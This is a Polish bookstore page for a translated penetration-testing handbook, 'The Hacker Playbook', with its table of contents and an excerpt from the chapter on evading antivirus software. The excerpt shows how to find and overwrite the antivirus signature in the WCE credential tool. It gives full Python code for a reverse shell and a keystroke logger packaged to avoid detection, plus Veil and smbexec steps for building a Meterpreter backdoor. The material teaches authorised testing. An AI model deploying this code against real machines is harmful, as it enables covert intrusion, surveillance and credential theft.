Cyfroteka.pl

klikaj i czytaj online

Cyfro
Czytomierz
00352 007526 11224200 na godz. na dobę w sumie
Podręcznik pentestera. Bezpieczeństwo systemów informatycznych - książka
Podręcznik pentestera. Bezpieczeństwo systemów informatycznych - książka
Autor: Liczba stron: 200
Wydawca: Helion Język publikacji: polski
ISBN: 978-83-283-0384-3 Data wydania:
Lektor:
Kategoria: ebooki >> komputery i informatyka >> hacking >> bezpieczeństwo www
Porównaj ceny (książka, ebook, audiobook).

Zweryfikuj bezpieczeństwo systemów informatycznych!

Testy penetracyjne (pentesty) to najbardziej wiarygodny sposób zweryfikowania bezpieczeństwa systemów informatycznych. Specjaliści na zlecenie próbują włamać się do systemu. Stosują przy tym wyrafinowane techniki, z których prawdopodobnie skorzystaliby włamywacze. Pentester weryfikujący bezpieczeństwo systemu przygotowuje raport, w którym opisuje wykryte luki lub słabości oprogramowania. Dzięki jego pracy kluczowe dane użytkowników są zdecydowanie bezpieczniejsze!

Jeżeli interesuje Cię działalność pentesterów i chciałbyś nauczyć się tak działać, trafiłeś na podręcznik, który wprowadzi Cię w ten świat. Dowiedz się, jak przygotować system do testów penetracyjnych, prowadzić atak oraz skonstruować raport, który dostarczy największą wartość klientowi. Poznaj zaawansowane narzędzia oraz techniki stosowane przez pentesterów. Odkryj najlepsze źródła informacji. Książka ta jest doskonałą i obowiązkową lekturą dla pasjonatów bezpieczeństwa systemów informatycznych, którzy chcą przeprowadzać testy penetracyjne systemów informatycznych.

Dzięki tej książce:

Skarbnica wiedzy początkującego pentestera!

Znajdź podobne książki Ostatnio czytane w tej kategorii

Darmowy fragment publikacji:

Tytuł oryginału: The Hacker Playbook: Practical Guide To Penetration Testing Tłumaczenie: Rafał Jońca ISBN: 978-83-283-0384-3 Copyright © 2014 by Secure Planet LLC. All rights reserved. Title of English-language original: The Hacker Playbook: Practical Guide To Penetration Testing, ISBN 978-1494932633, published by Secure Planet LLC. Polish language edition copyright © 2015 by Helion S.A. All rights reserved. All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji. Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Autor oraz Wydawnictwo HELION dołożyli wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION nie ponoszą również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce. Wydawnictwo HELION ul. Kościuszki 1c, 44-100 GLIWICE tel. 32 231 22 19, 32 230 98 63 e-mail: helion@helion.pl WWW: http://helion.pl (księgarnia internetowa, katalog książek) Drogi Czytelniku! Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/podpen Możesz tam wpisać swoje uwagi, spostrzeżenia, recenzję. Printed in Poland. • Kup książkę • Poleć książkę • Oceń książkę • Księgarnia internetowa • Lubię to! » Nasza społeczność SPIS TRE(cid:165)CI Przedmowa ..................................................................................................7 Wprowadzenie ..............................................................................................9 Rozdzia(cid:239) 1. Przed gr(cid:200) — konfiguracja ............................................................13 Przygotowanie komputera do testów penetracyjnych ............................................. 13 Sprz(cid:218)t .............................................................................................................. 13 Oprogramowanie komercyjne .......................................................................... 14 Kali Linux ........................................................................................................ 15 Maszyna wirtualna z systemem Windows ........................................................ 20 Podsumowanie ..................................................................................................... 22 Rozdzia(cid:239) 2. Przed gwizdkiem — skanowanie sieci ...........................................23 Skanowanie zewn(cid:218)trzne ........................................................................................ 23 Analiza pasywna .............................................................................................. 23 Discover Scripts (dawniej BackTrack Scripts) — system Kali Linux ....................... 24 Realizacja analizy pasywnej ............................................................................. 25 U(cid:285)ycie adresów e-mail i danych uwierzytelniaj(cid:200)cych, które wyciek(cid:239)y do internetu ........................................................................... 27 Analiza aktywna — wewn(cid:218)trzna i zewn(cid:218)trzna ...................................................... 31 Proces skanowania sieci ................................................................................... 31 Skanowanie aplikacji webowych ........................................................................... 40 Proces skanowania witryn ................................................................................ 40 Skanowanie aplikacji internetowych ................................................................ 41 Podsumowanie ..................................................................................................... 49 Rozdzia(cid:239) 3. Ci(cid:200)g — wykorzystywanie s(cid:239)abo(cid:258)ci wykrytych przez skanery .............51 Metasploit ............................................................................................................ 51 Podstawowe kroki zwi(cid:200)zane z konfiguracj(cid:200) zdalnego ataku .............................. 52 Przeszukiwanie Metasploita (stara, dobra luka MS08-067) ............................... 52 Skrypty ................................................................................................................. 54 Przyk(cid:239)adowa luka w WarFTP ........................................................................... 54 Podsumowanie ..................................................................................................... 56 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA Rozdzia(cid:239) 4. Rzut — samodzielne znajdowanie luk w aplikacjach webowych ...... 57 Testy penetracyjne aplikacji webowych ................................................................. 57 Wstrzykiwanie kodu SQL ................................................................................ 57 Wykonywanie skryptów mi(cid:218)dzy witrynami (XSS) ............................................. 66 Atak CSRF ....................................................................................................... 73 Tokeny sesji .................................................................................................... 76 Dodatkowe sprawdzenie danych wej(cid:258)ciowych .................................................. 78 Testy funkcjonalne i logiki biznesowej ............................................................. 82 Podsumowanie ..................................................................................................... 83 Rozdzia(cid:239) 5. Podanie boczne — poruszanie si(cid:218) po sieci .................................... 85 W sieci bez danych uwierzytelniaj(cid:200)cych ................................................................ 85 Narz(cid:218)dzie Responder.py (Kali Linux) ................................................................ 86 Kroki do wykonania, gdy posiadamy podstawowy dost(cid:218)p do domeny .................... 89 Preferencje zasad grupy .................................................................................... 90 Pobieranie danych uwierzytelniaj(cid:200)cych zapisanych jawnym tekstem ................ 92 Wskazówki dotycz(cid:200)ce tego, co robi(cid:202) po w(cid:239)amaniu si(cid:218) do systemu .................... 94 Kroki do wykonania, gdy posiadamy dost(cid:218)p do lokalnego konta administracyjnego lub konta administratora domeny ......................................... 95 Przej(cid:218)cie kontroli nad sieci(cid:200) za pomoc(cid:200) po(cid:258)wiadcze(cid:241) i narz(cid:218)dzia PsExec .......... 95 Atak na kontroler domeny ............................................................................. 101 U(cid:285)ycie narz(cid:218)dzia PowerSploit po wst(cid:218)pnym w(cid:239)amaniu (Windows) ...................... 103 Polecenia ....................................................................................................... 105 PowerShell po wst(cid:218)pnym w(cid:239)amaniu (Windows) .................................................. 108 Zatrucie ARP ...................................................................................................... 111 IPv4 ............................................................................................................... 111 IPv6 ............................................................................................................... 115 Kroki do wykonania po zatruciu ARP ............................................................. 117 Tworzenie proxy mi(cid:218)dzy hostami ....................................................................... 123 Podsumowanie ................................................................................................... 124 Rozdzia(cid:239) 6. Ekran — in(cid:285)ynieria spo(cid:239)eczna .................................................... 125 Podobie(cid:241)stwo domen .......................................................................................... 125 Atak wykorzystuj(cid:200)cy SMTP ........................................................................... 125 Atak wykorzystuj(cid:200)cy SSH .............................................................................. 127 Ataki phishingowe .............................................................................................. 128 Metasploit Pro — modu(cid:239) do phishingu .......................................................... 128 Social-Engineer Toolkit (Kali Linux) .............................................................. 131 Wysy(cid:239)anie du(cid:285)ej ilo(cid:258)ci e-maili w ramach kampanii phishingowych ................ 134 In(cid:285)ynieria spo(cid:239)eczna i Microsoft Excel ........................................................... 135 Podsumowanie ................................................................................................... 138 Rozdzia(cid:239) 7. Wykop na bok — ataki wymagaj(cid:200)ce fizycznego dost(cid:218)pu ............... 141 W(cid:239)amywanie si(cid:218) do sieci bezprzewodowych ........................................................ 141 Atak pasywny — identyfikacja i rekonesans ................................................... 142 Atak aktywny ................................................................................................ 144 4 Kup książkęPoleć książkę SPIS TRE(cid:165)CI Atak fizyczny ...................................................................................................... 152 Klonowanie kart ............................................................................................ 152 Testy penetracyjne z podrzuconej skrzynki .................................................... 153 Fizyczne aspekty in(cid:285)ynierii spo(cid:239)ecznej ........................................................... 156 Podsumowanie ................................................................................................... 156 Rozdzia(cid:239) 8. Zmy(cid:239)ka rozgrywaj(cid:200)cego — omijanie programów antywirusowych ...157 Oszukiwanie skanerów antywirusowych ............................................................. 157 Ukrywanie WCE przed programami antywirusowymi (Windows) .................. 157 Skrypty w j(cid:218)zyku Python ................................................................................ 161 Podsumowanie ................................................................................................... 167 Rozdzia(cid:239) 9. Zespo(cid:239)y specjalne — (cid:239)amanie hase(cid:239), nietypowe luki i inne sztuczki ..........................................................................169 (cid:146)amanie hase(cid:239) .................................................................................................... 169 Narz(cid:218)dzie John the Ripper (JtR) ..................................................................... 171 Narz(cid:218)dzie oclHashcat .................................................................................... 171 Poszukiwanie s(cid:239)abych punktów .......................................................................... 175 Searchsploit (Kali Linux) ................................................................................ 175 Bugtraq .......................................................................................................... 176 Exploit Database ............................................................................................ 176 Odpytywanie za pomoc(cid:200) narz(cid:218)dzia Metasploit ............................................... 178 Wskazówki i sztuczki ......................................................................................... 178 Skrypty RC w Metasploit ............................................................................... 178 Omini(cid:218)cie UAC ............................................................................................. 179 Omini(cid:218)cie filtrowania ruchu dla swoich domen ............................................. 180 Windows XP — stara sztuczka z serwerem FTP ............................................. 181 Ukrywanie plików (Windows) ........................................................................ 181 Zapewnienie ukrycia plików (Windows) ......................................................... 182 Przesy(cid:239)anie plików do komputera w systemach Windows 7 i Windows 8 .............................................................................. 184 Rozdzia(cid:239) 10. Analiza po grze — raportowanie ...............................................185 Raport ................................................................................................................ 185 Lista moich zalece(cid:241) i sprawdzonych rozwi(cid:200)za(cid:241) .............................................. 186 Rozdzia(cid:239) 11. Kontynuacja edukacji ..............................................................189 G(cid:239)ówne konferencje ............................................................................................ 189 Konferencje, które polecam z w(cid:239)asnego do(cid:258)wiadczenia ................................... 189 Kursy .................................................................................................................. 190 Ksi(cid:200)(cid:285)ki ................................................................................................................ 190 Ksi(cid:200)(cid:285)ki techniczne ......................................................................................... 191 Ciekawe ksi(cid:200)(cid:285)ki poruszaj(cid:200)ce tematyk(cid:218) bezpiecze(cid:241)stwa informatycznego ....... 191 Frameworki dotycz(cid:200)ce testów integracyjnych ...................................................... 191 Zdobywanie flagi ................................................................................................ 192 5 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA B(cid:200)d(cid:283) na bie(cid:285)(cid:200)co .................................................................................................. 192 Kana(cid:239) RSS i strony WWW .............................................................................. 193 Listy mailingowe ............................................................................................ 193 Listy na Twitterze .......................................................................................... 193 Dodatek A: Uwagi ko(cid:241)cowe ....................................................................... 195 Podzi(cid:218)kowania ......................................................................................... 196 Skorowidz ................................................................................................ 197 6 Kup książkęPoleć książkę Rozdzia(cid:239) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH Uwa(cid:285)am, (cid:285)e skanery antywirusowe istniej(cid:200) tylko po to, by zatrzyma(cid:202) dzieciaki bawi(cid:200)ce si(cid:218) w hakerów. Je(cid:258)li korzystasz z domy(cid:258)lnych ustawie(cid:241) Metasploita lub u(cid:285)ywasz plików pobranych wcze(cid:258)niej z internetu bez (cid:285)adnej obróbki, jest du(cid:285)e prawdopodobie(cid:241)stwo, (cid:285)e nie tylko zostaniesz z(cid:239)apany, ale (cid:285)e tak(cid:285)e zako(cid:241)czy si(cid:218) ca(cid:239)y test. Element zaskoczenia to istotny czynnik wp(cid:239)ywaj(cid:200)cy na sukces w poruszaniu si(cid:218) po atakowanej sieci. W tym roz- dziale wyja(cid:258)ni(cid:218), jak nie da(cid:202) si(cid:218) z(cid:239)apa(cid:202) skanerom antywirusowym. OSZUKIWANIE SKANERÓW ANTYWIRUSOWYCH Regularnie napotykam programy antywirusowe, które blokuj(cid:200) (cid:239)adunek Meterpretera, za- pobiegaj(cid:200) u(cid:285)yciu programu WCE (ang. Windows Credentials Editor) lub innego narz(cid:218)dzia do testów penetracyjnych albo te(cid:285) przekazuj(cid:200) u(cid:285)ytkownikowi odpowiednie informacje ostrzegawcze. Obecnie gwarancji przemkni(cid:218)cia si(cid:218) nie daj(cid:200) ju(cid:285) szyfratory wbudowane w narz(cid:218)dzie Metasploit, takie jak msfvenom lub Shikata Ga Nai. Zanim przejdziemy do zagadnienia omijania skanerów antywirusowych, chcia(cid:239)bym po- kaza(cid:202), czego szukaj(cid:200) tego rodzaju skanery. Je(cid:258)li od jakiego(cid:258) czasu starasz si(cid:218) unika(cid:202) wy- krycia przez skanery, zapewne wiesz, (cid:285)e w wi(cid:218)kszo(cid:258)ci bazuj(cid:200) one na sygnaturach. Skaner szuka okre(cid:258)lonych ci(cid:200)gów znaków i gdy je rozpozna, wszczyna alarm. Przedstawione te- raz przyk(cid:239)ady poka(cid:285)(cid:200), jak (cid:239)atwo mo(cid:285)na manipulowa(cid:202) programami antywirusowymi. UKRYWANIE WCE PRZED PROGRAMAMI ANTYWIRUSOWYMI (WINDOWS) Uwielbiam narz(cid:218)dzie WCE, poniewa(cid:285) umo(cid:285)liwia wyci(cid:200)gni(cid:218)cie z pami(cid:218)ci komputera hase(cid:239) zapisanych jawnym tekstem. Problem polega na tym, (cid:285)e WCE powoduje alarm w zasadzie Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA we wszystkich skanerach antywirusowych. Najszybszym sposobem omini(cid:218)cia programu antywirusowego jest wi(cid:218)c sprawdzenie, gdzie w pliku WCE skaner szuka sygnatury, po czym zmienienie jej. Przyk(cid:239)ad — narz(cid:218)dzie Evade W komputerze z systemem Windows uruchom narz(cid:218)dzie Evade (https://www.securepla. net/antivirus-now-you-see-me-now-you-dont/). Evade przyjmuje jako dane plik wykony- walny i tworzy wiele cz(cid:218)(cid:258)ci tego pliku na podstawie zadanego rozmiaru. Przypu(cid:258)(cid:202)my, (cid:285)e mamy plik o rozmiarze 50 kB i chcemy podzieli(cid:202) go na pliki o rozmiarze 5 kB ka(cid:285)dy. Po- wstanie 10 ró(cid:285)nych cz(cid:218)(cid:258)ci pliku. Pierwszy plik b(cid:218)dzie zawiera(cid:239) pierwsze 5 kB danych (na- g(cid:239)ówek MZ i kilka dodatkowych informacji). Drugi plik b(cid:218)dzie zawiera(cid:239) oprócz pierwszych 5 kB tak(cid:285)e nast(cid:218)pne 5 kB. Wszystko powtórzy si(cid:218) a(cid:285) do uzyskania pe(cid:239)nego pliku. W przedstawionym przyk(cid:239)adzie wczyta(cid:239)em plik WCE, zdefiniowa(cid:239)em folder wyj(cid:258)ciowy i klikn(cid:200)(cid:239)em przycisk Split! (rysunek 8.1). W folderze wynikowym znajduj(cid:200) si(cid:218) pliki sta- nowi(cid:200)ce poszczególne cz(cid:218)(cid:258)ci pliku wej(cid:258)ciowego (rysunek 8.2). Rysunek 8.1. Narz(cid:218)dzie Evade Powinni(cid:258)my uzyska(cid:202) zbiór ró(cid:285)nych plików. Po uruchomieniu szesnastkowego edytora plików (HxD) mo(cid:285)emy zauwa(cid:285)y(cid:202), (cid:285)e pierwszy z nich zawiera pierwsze 5000 bajtów, a drugi — pierwsze 10 000 bajtów (rysunek 8.3). Po otwarciu kalkulatora mo(cid:285)emy odj(cid:200)(cid:202) od siebie warto(cid:258)ci szesnastkowe: 270F–1387 daje 1388, co po zamianie na warto(cid:258)(cid:202) szesnastkow(cid:200) daje ostatecznie warto(cid:258)(cid:202) 5000. Idealnie! 158 Kup książkęPoleć książkę ROZDZIA(cid:146) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH Rysunek 8.2. Wynik dzia(cid:239)ania narz(cid:218)dzia Evade Zacznij od najmniejszego pliku i przeskanuj go za pomoc(cid:200) wybranego skanera antywi- rusowego. Czy w(cid:239)(cid:200)czy(cid:239) si(cid:218) alarm? Je(cid:258)li nie, przejd(cid:283) do nast(cid:218)pnego pliku. Je(cid:258)li tym razem program antywirusowy zg(cid:239)osi(cid:239) ostrze(cid:285)enie, oznacza to, (cid:285)e ostatnie 5000 bajtów ostatnie- go pliku zawiera co(cid:258), co wywo(cid:239)uje alarm w programie antywirusowym (rysunek 8.4). Podczas generowania plików lub skanowania r(cid:218)cznego program antywirusowy informu- je u(cid:285)ytkownika o podejrzanych plikach. W zale(cid:285)no(cid:258)ci od wybranej przez program akcji pliki po TestFile_145000 mog(cid:200) zosta(cid:202) usuni(cid:218)te, co oznacza, (cid:285)e sygnatura musi znajdowa(cid:202) si(cid:218) mi(cid:218)dzy bajtami 145 000 – 150 000. Zobaczmy, co znajduje si(cid:218) w tym miejscu. Po zamianie 145 000 na warto(cid:258)(cid:202) szesnastko- w(cid:200) otrzymujemy 23 668. Przekonajmy si(cid:218) w edytorze HxD, co te(cid:285) tutaj jest. Poszukaj ciekawych miejsc w pliku lub uruchom ponownie narz(cid:218)dzie Evade, aby bardziej szczegó- (cid:239)owo podzieli(cid:202) plik wykonywalny. Wydaje si(cid:218), (cid:285)e tym razem uda(cid:239)o mi si(cid:218) zlokalizowa(cid:202) miejsce, którego poszukuje program antywirusowy. Sygnatur(cid:200) jest nazwa aplikacji i jej autor (rysunek 8.5). Za pomoc(cid:200) edytora HxD mo(cid:285)emy nadpisa(cid:202) te warto(cid:258)ci, po czym zapisa(cid:202) zmodyfikowa- ny plik wykonywalny pod now(cid:200) nazw(cid:200) (rysunek 8.6). Nadpisa(cid:239)em sygnatur(cid:218) warto(cid:258)ciami odpowiadaj(cid:200)cymi znakowi A i zapisa(cid:239)em plik jako wce2.exe. Na szcz(cid:218)(cid:258)cie w tym przypadku sygnatura nie dotyczy binarnej cz(cid:218)(cid:258)ci pliku wy- konywalnego, a jedynie danych wy(cid:258)wietlanych na ekranie. Przetestujmy zmodyfikowan(cid:200) wersj(cid:218) pliku w programie antywirusowym (rysunek 8.7). 159 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA Rysunek 8.3. Porównanie plików Skaner nie zg(cid:239)asza ju(cid:285) (cid:285)adnych uwag wzgl(cid:218)dem aplikacji, a samo narz(cid:218)dzie nadal funkcjo- nuje znakomicie. Warto pami(cid:218)ta(cid:202), (cid:285)e wszystko dzia(cid:239)a, poniewa(cid:285) modyfikowane warto(cid:258)ci dotyczy(cid:239)y tekstów pojawiaj(cid:200)cych si(cid:218) na ekranie, a nie samego kodu binarnego aplikacji. 160 Kup książkęPoleć książkę ROZDZIA(cid:146) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH Rysunek 8.4. Znajdowanie pliku powoduj(cid:200)cego ostrze(cid:285)enie w programie antywirusowym Rysunek 8.5. Identyfikacja sygnatury wywo(cid:239)uj(cid:200)cej alarm w programie antywirusowym Je(cid:258)li sygnatura bazowa(cid:239)aby na kodzie, którego nie mo(cid:285)na zmieni(cid:202), przedstawiony trik nie zadzia(cid:239)a(cid:239)by. Niniejszy przyk(cid:239)ad mia(cid:239) przede wszystkim zobrazowa(cid:202) s(cid:239)abo(cid:258)(cid:202) programów antywirusowych i sam(cid:200) ide(cid:218) unikania wykrycia zagro(cid:285)enia przez skaner. SKRYPTY W J(cid:125)ZYKU PYTHON Python to Twój najlepszy przyjaciel. U(cid:285)ywam tego j(cid:218)zyka do tworzenia wi(cid:218)kszo(cid:258)ci na- rz(cid:218)dzi i przeprowadzania w(cid:239)ama(cid:241). Powodów, dla których korzystam z j(cid:218)zyka Python, jest kilka. Po pierwsze, istnieje wiele systemów, które pliki wykonywalne i skrypty Pythona 161 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA Rysunek 8.6. Modyfikacja sygnatury w(cid:239)(cid:200)czaj(cid:200)cej alarm Rysunek 8.7. Skaner antywirusowy niesygnalizuj(cid:200)cy ju(cid:285) zagro(cid:285)enia maj(cid:200) na swojej „bia(cid:239)ej li(cid:258)cie”. Po drugie, bardzo (cid:239)atwo doda(cid:202) element losowo(cid:258)ci i obej(cid:258)(cid:202) dowoln(cid:200) sygnatur(cid:218). Po trzecie, dzi(cid:218)ki narz(cid:218)dziom takim jak py2exe mo(cid:285)na bardzo (cid:239)atwo zamieni(cid:202) dowolny skrypt na plik wykonywalny. Pow(cid:239)oka j(cid:218)zyka Python Po obejrzeniu prezentacji Dave(cid:31)a Kennedy ego na konferencji BSides w 2012 roku (http:// www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf) na powa(cid:285)nie za- interesowa(cid:239)em si(cid:218) wykorzystaniem j(cid:218)zyka Python do tworzenia niebezpiecznych (cid:239)adun- 162 Kup książkęPoleć książkę ROZDZIA(cid:146) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH ków. Okazuje si(cid:218), (cid:285)e naj(cid:239)atwiej napisa(cid:202) prosty skrypt i nast(cid:218)pnie zamieni(cid:202) go na plik wy- konywalny za pomoc(cid:200) narz(cid:218)dzia py2exe. #!/usr/bin/python import socket, subprocess HOST = 192.168.10.100 PORT = 5151 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.send( [*] Ustanowiono po(cid:239)(cid:200)czenie! ) while 1: data = s.recv(1024) if data == quit : break proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = proc.stdout.read() + proc.stderr.read() s.send(stdout_value) s.close() Przedstawiony kod utworzy po(cid:239)(cid:200)czenie konsolowe do adresu IP 192.168.10.100 na porcie 5151. Je(cid:258)li mam tam uruchomione narz(cid:218)dzie netcat, uzyskam efekt odwróconej pow(cid:239)o- ki. Korzystaj(cid:200)c z programu PyInstaller, mo(cid:285)emy zamieni(cid:202) plik py na plik wykonywalny. C:\python27\python.exe C:\utils\pyinstaller-2.0\pyinstaller.py --out=C:\shell\ --noconsole --onefile C:\shell\shell.py O ile wiem, (cid:285)aden program antywirusowy nie podniesie alarmu w przypadku takiego pliku. Logowanie znaków w Pythonie1 Wykorzystuje si(cid:218) wiele ró(cid:285)nych rodzajów narz(cid:218)dzi do logowania wprowadzanych znaków. Moim celem przy tworzeniu takiego narz(cid:218)dzia by(cid:239)a ch(cid:218)(cid:202) unikni(cid:218)cia rozpoznania przez program antywirusowy i, w miar(cid:218) mo(cid:285)liwo(cid:258)ci, znalezienie si(cid:218) na „bia(cid:239)ej li(cid:258)cie” dopusz- czonych aplikacji. Przedstawiony skrypt spowoduje, (cid:285)e b(cid:218)d(cid:200) rejestrowane wszystkie klawisze naci(cid:258)ni(cid:218)te na klawiaturze. import pyHook, pythoncom, sys, logging file_log = C:\\systemlog.txt def OnKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format= (message)s ) chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() 1 http://www.youtube.com/watch?v=8BiOPBsXh0g#t=163 163 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA Oto mój plik konfiguracyjny setup.py: from distutils.core import setup import py2exe setup(options = { py2exe : { bundle_files : 1, compressed : True}}, windows = [{ script : logger.py }], zipfile = None, ) Dzi(cid:218)ki narz(cid:218)dziu py2exe skonwertuj(cid:218) skrypt na plik wykonywalny, wykonuj(cid:200)c poni(cid:285)sze polecenia: python.exe setup.py install python.exe setup.py py2exe Uzyska(cid:239)em w ten sposób plik binarny, który zapisuje wszystkie naci(cid:258)ni(cid:218)te klawisze w pli- ku C:\systemlog.txt. Skrypt jest niezwykle prosty i jak do tej pory nie wykry(cid:239) go (cid:285)aden pro- gram antywirusowy. W razie potrzeby mo(cid:285)na doda(cid:202) do skryptu nieco losowo(cid:258)ci, by mie(cid:202) pewno(cid:258)(cid:202), (cid:285)e jego sygnatura nie znajduje si(cid:218) bazie danych programu antywirusowego. Przyk(cid:239)ad u(cid:285)ycia narz(cid:218)dzia Veil (Kali Linux) Veil to napisany przez Christophera Truncera generator (cid:239)adunków, którego zadaniem jest omijanie zabezpiecze(cid:241) antywirusowych. Narz(cid:218)dzie korzysta z wielu ró(cid:285)nych technik, by oszuka(cid:202) skaner antywirusowy. Najbardziej znane jest jednak z przyjmowania pow(cid:239)o- ki Meterpretera, jej konwersji na j(cid:218)zyk Python i opakowania (cid:239)adunku za pomoc(cid:200) py2exe lub pyinstaller. W ten sposób plik wykonywalny potrafi oszuka(cid:202) wiele programów an- tywirusowych, a nawet znale(cid:283)(cid:202) si(cid:218) na „bia(cid:239)ej li(cid:258)cie” programów dopuszczonych do wy- konania. Istnieje wiele ró(cid:285)nych sposobów u(cid:285)ycia narz(cid:218)dzia Veil — opisz(cid:218) ten najpopu- larniejszy. Utworzenie zaszyfrowanego pliku Meterpretera dla odwróconej pow(cid:239)oki Wykonaj nast(cid:218)puj(cid:200)ce czynno(cid:258)ci: (cid:120) Przejd(cid:283) do folderu /opt/Veil i wykonaj skrypt: cd /opt/Veil ./Veil-Evasion.py. (cid:120) W przyk(cid:239)adzie u(cid:285)yjemy (cid:239)adunku MeterHTTPSContained, wi(cid:218)c wpisz poni(cid:285)sze polecenie: use 25 (cid:120) Podobnie jak w przypadku Metasploita ustawimy warto(cid:258)ci LHOST i LPORT. Przyk(cid:239)adowo mój system atakuj(cid:200)cy ma adres IP 192.168.75.131, a portem nas(cid:239)uchuj(cid:200)cym (LPORT) jest port 443 (by udawa(cid:202) komunikacj(cid:218) SSL): set LHOST 192.168.75.131 set LPORT 443 164 Kup książkęPoleć książkę ROZDZIA(cid:146) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH (cid:120) Wpisz poni(cid:285)sze polecenie, aby wygenerowa(cid:202) (cid:239)adunek (rysunek 8.8): generate Rysunek 8.8. Konfiguracja narz(cid:218)dzia Veil Jak wcze(cid:258)niej wspomnia(cid:239)em, chcemy otoczy(cid:202) wynikowy plik wykonywalny skryptem Pythona, aby unikn(cid:200)(cid:202) wykrycia. Skorzystaj z domy(cid:258)lnego instalatora pyinstaller, wy- bieraj(cid:200)c opcj(cid:218) numer 1 (rysunek 8.9). Po zako(cid:241)czeniu pracy narz(cid:218)dzie Veil umie(cid:258)ci plik wynikowy w folderze /root/veil-output/ compiled/. Nie umieszczaj wyniku w witrynach typu VirusTotal, bo mo(cid:285)e to spowodo- wa(cid:202) w przysz(cid:239)o(cid:258)ci zg(cid:239)oszenie alertu antywirusowego. Mo(cid:285)na natomiast sprawdzi(cid:202) plik wynikowy za pomoc(cid:200) lokalnych programów antywirusowych. Ten sposób dzia(cid:239)ania jak na razie jeszcze mnie nie zawiód(cid:239), wi(cid:218)c, jak s(cid:200)dz(cid:218), powinien stanowi(cid:202) cz(cid:218)(cid:258)(cid:202) arsena(cid:239)u ka(cid:285)- dego testera. 165 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA Rysunek 8.9. J(cid:218)zyk Python — ukrycie odwróconej pow(cid:239)oki Meterpretera Narz(cid:218)dzie smbexec (Kali Linux) Smbexec to narz(cid:218)dzie napisane przez brav0hax (https://github.com/brav0hax/smbexec), oferuj(cid:200)ce wiele ró(cid:285)nych funkcji. W ksi(cid:200)(cid:285)ce u(cid:285)yli(cid:258)my ju(cid:285) tego narz(cid:218)dzia do pobrania skró- tów z kontrolera domeny, ale mo(cid:285)na je wykorzysta(cid:202) równie(cid:285) do wydobycia listy udzia(cid:239)ów, sprawdzenia loginów, wy(cid:239)(cid:200)czenia UAC (ang. User Account Control), a nawet utworzenia zaszyfrowanych wersji plików wykonywalnych Meterpretera. Twórca narz(cid:218)dzia u(cid:285)ywa wielu technik s(cid:239)u(cid:285)(cid:200)cych do zaciemnienia w(cid:239)a(cid:258)ciwej tre(cid:258)ci, w(cid:239)(cid:200)czaj(cid:200)c w to losowe zmiany i kompilacj(cid:218) bezpo(cid:258)rednio z kodu (cid:283)ród(cid:239)owego w j(cid:218)zyku C (zajrzyj do kodu (cid:283)ród(cid:239)owego smbexec.sh, by pozna(cid:202) szczegó(cid:239)y). W przedstawionym przyk(cid:239)adzie utworzymy odwróco- n(cid:200) pow(cid:239)ok(cid:218). Utworzenie zaszyfrowanego pliku Meterpretera dla odwróconej pow(cid:239)oki Wykonaj kolejno nast(cid:218)puj(cid:200)ce czynno(cid:258)ci: (cid:120) Wykonaj polecenia: cd /opt/smbexec ./smbexec.sh (cid:120) Wybierz polecenie numer 2 (System Access). (cid:120) Wybierz polecenie numer 2 (Create an executable and rc script). (cid:120) Wybierz polecenie numer 2 (windows/meterpreter/reverse_https). (cid:120) Wpisz lokalny adres IP i numer portu: 172.16.139.209, 443. Po zako(cid:241)czeniu pracy przez narz(cid:218)dzie smbexec w folderze, w którym si(cid:218) obecnie znaj- dujemy, pojawia si(cid:218) nowy folder. W jego nazwie znajdziemy dane dotycz(cid:200)ce daty i czasu 166 Kup książkęPoleć książkę ROZDZIA(cid:146) 8. ZMY(cid:146)KA ROZGRYWAJ(cid:107)CEGO — OMIJANIE PROGRAMÓW ANTYWIRUSOWYCH utworzenia. Folder zawiera plik backdoor.exe, który stanowi zaszyfrowany plik wykony- walny Meterpretera dla odwróconej pow(cid:239)oki. root@kali:/opt/smbexec/2013-12-23-1425-smbexec# ls -alh total 128K drwxr-xr-x 2 root root 4.0K Dec 29 18:28 . drwxr-xr-x 10 root root 4.0K Dec 23 14:44 .. -rwxr-xr-x 1 root root 110K Dec 23 14:28 